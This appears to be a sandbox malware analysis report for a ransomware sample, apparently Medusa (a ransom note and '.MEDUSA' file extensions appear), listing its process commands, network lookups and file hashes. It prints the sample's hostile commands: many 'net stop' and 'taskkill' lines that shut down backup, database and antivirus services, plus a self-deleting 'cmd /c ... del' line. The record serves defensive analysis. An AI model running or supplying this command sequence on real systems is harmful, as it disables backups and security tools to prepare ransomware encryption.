C:\Windows\system32\net1 stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "W3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "W3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "WRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net stop "EhttpSrv" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EhttpSrv" /y

C:\Windows\SysWOW64\net.exe

net stop "ekrn" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ekrn" /y

C:\Windows\SysWOW64\net.exe

net stop "ESHASRV" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ESHASRV" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "AVP" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AVP" /y

C:\Windows\SysWOW64\net.exe

net stop "klnagent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "klnagent" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "kavfsslp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "kavfsslp" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFSGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFSGT" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFS" /y

C:\Windows\SysWOW64\net.exe

net stop "mfefire" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfefire" /y

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM zoolz.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM agntsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbeng50.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbsnmp.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM encsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM excel.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefoxconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM infopath.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM isqlplussvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msaccess.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msftesql.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mspub.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopqos.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-nt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-opt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocautoupds.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocomm.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocssd.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM onenote.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM oracle.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM outlook.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM powerpnt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqbcoreservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlagent.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlbrowser.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlservr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlwriter.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM steam.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM synctime.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tbirdconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat64.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thunderbird.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM visio.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM winword.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM wordpad.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM xfssvccon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tmlisten.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM PccNTMon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM CNTAoSMgr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Ntrtscan.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mbamtray.exe /T

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1856 -ip 1856

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 364

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
NL 52.111.243.31:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

F:\!!!READ_ME_MEDUSA!!!.txt

MD5 ae2ccfb68aaf040e01ec2280b75c4d49
SHA1 6dd072344d5159e751451ba24624a1e2adbe6e07
SHA256 beff87729e2c44475014eb1efd72bb128b33a9b22309339c2332e3f718e8c4cd
SHA512 69dc9b2ff371a8f49b2d236e81bcaba33df55d5e96f262b16a2de170c88832fbd8696f00e39ef5ee0d8ee85e988abc2b80b3901a773d9161f0d9dc525f5f1618

C:\$Recycle.Bin\S-1-5-21-1194130065-3471212556-1656947724-1000\desktop.ini

MD5 461144deb78f186786c0083b1d631ba5
SHA1 6edf715f4572cc97d4fc2e6d85fe4a3000460695
SHA256 62966eca3d9068ba40aca83474c1fcbd253c024c9275f3c8842b3a1acc0c9735
SHA512 42a5b37cb99338fa00e7984b22773cc1d91f417eb7c50b7cac136b6cdda42f2faa5cd14642ada887cac18f2b02af9889d4f3356f4e104adce81aeafcd17aed77

C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.MEDUSA

MD5 3169afccd4668ba411f6251dfc00c4e5
SHA1 c780245a8869741d733a310fb4bd51812fdbfda1
SHA256 b910a6fe8a3a6dcf3325e6c08a1a1aad55caec1d2944339fd6b341171ac76fa1
SHA512 c1b3a4087e655032a5bae22e59c55d3d5aaf14f3fc3fd12f0d8757135e17680d048d652379545f33e41e23f5923dbfa5aa30183bd8f72ee6550b1076de3c6b50